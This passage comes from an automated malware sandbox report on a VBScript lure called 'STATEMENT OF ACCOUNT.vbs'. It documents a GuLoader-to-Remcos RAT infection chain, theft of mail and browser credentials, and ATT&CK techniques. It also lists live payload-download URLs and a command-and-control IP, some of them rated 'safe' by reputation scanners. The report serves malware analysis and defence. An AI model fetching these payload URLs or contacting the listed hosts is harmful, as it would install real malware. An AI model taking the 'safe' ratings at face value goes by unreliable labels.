                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword11_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword11_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword11_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7936, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8036, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-LO8JHKJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)212
                Process Injection                		1
                Software Packing                		2
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter                		Login HookLogin Hook1
                DLL Side-Loading                		1
                Credentials In Files                		129
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets141
                Security Software Discovery                		SSH2
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Virtualization/Sandbox Evasion                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture112
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465957 Sample: STATEMENT OF ACCOUNT.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 10 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49731, 49738, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.159, 49739, 49740, 9462 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 24->36         started        38 4 other processes 24->38 file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 36->88

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                STATEMENT OF ACCOUNT.vbs8%ReversingLabsScript-WScript.Trojan.GuLoader

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                geoplugin.net1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://www.imvu.comta0%Avira URL Cloudsafe
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W0%Avira URL Cloudsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret.hhk0%Avira URL Cloudsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://103.237.86.2470%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                http://103.237.86.2470%VirustotalBrowse
                http://103.237.860%Avira URL Cloudsafe
                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret.hhkXR0%Avira URL Cloudsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
                https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr0%Avira URL Cloudsafe
                http://103.237.86.247/U0%Avira URL Cloudsafe
                https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
                http://www.nirsoft.net0%VirustotalBrowse
                https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr0%Avira URL Cloudsafe
                http://103.237.86.247/Udma0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb510%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpC0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c0%Avira URL Cloudsafe
                http://103.237.86.247/Ud0%Avira URL Cloudsafe
                http://103.2370%Avira URL Cloudsafe
                http://103.237.0%Avira URL Cloudsafe
                https://maps.windows.com/windows-app-web-link0%Avira URL Cloudsafe
                http://103.237.0%VirustotalBrowse
                http://103.2370%VirustotalBrowse
                http://geoplugin.net/json.gpC0%VirustotalBrowse
                http://103.237.80%Avira URL Cloudsafe
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                http://103.20%Avira URL Cloudsafe
                http://103.237.86.247/Udmag0%Avira URL Cloudsafe
                http://103.237.86.0%Avira URL Cloudsafe
                https://maps.windows.com/windows-app-web-link0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://103.237.86.247/Udmagr0%Avira URL Cloudsafe
                http://crl.micro?0%Avira URL Cloudsafe
                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc80%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://103.237.80%VirustotalBrowse
                http://geoplugin.net/json.gpW0%Avira URL Cloudsafe
                http://103.21%VirustotalBrowse
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%VirustotalBrowse
                http://103.237.86.247/NtqoCaH77.bin0%Avira URL Cloudsafe
                https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d0%Avira URL Cloudsafe
                http://103.237H0%Avira URL Cloudsafe
                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpW0%VirustotalBrowse
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%Avira URL Cloudsafe
                https://www.office.com/0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%VirustotalBrowse
                https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a80%Avira URL Cloudsafe
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e20%Avira URL Cloudsafe
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpk0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret.h0%Avira URL Cloudsafe
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpt0%Avira URL Cloudsafe
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
                http://103.237.86.247/Udm0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagre0%Avira URL Cloudsafe
                http://103.237.86.20%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://103.237.86.247/0%Avira URL Cloudsafe
                103.237.87.1590%Avira URL Cloudsafe
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe
                http://103.237.86.240%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret.0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae0%Avira URL Cloudsafe
                http://103.237.86.247/Udmagret.hh0%Avira URL Cloudsafe
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
                https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc1749930%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://103.237.86.247/Udmagret.hhkfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/NtqoCaH77.binfalse
                • Avira URL Cloud: safe
                		unknown
                103.237.87.159true
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.imvu.comrwab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comtawab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingthbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD6A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagret.hhkXRpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.netwab.exe, 0000000A.00000002.2348371588.0000000002F03000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2372810283.0000000002D83000.00000004.00000010.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingaotakbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://deff.nelreports.net/api/report?cat=msnbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Upowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmapowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.comwab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpCwab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://maps.windows.com/windows-app-web-linkbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.8powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.2powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagrpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.micro?powershell.exe, 00000004.00000002.2232934862.0000000006C5E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpWwab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237Hpowershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.office.com/bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpkwab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://go.micropowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/Udmagret.hpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comwab.exe, wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=wsbbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gptwab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagrepowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
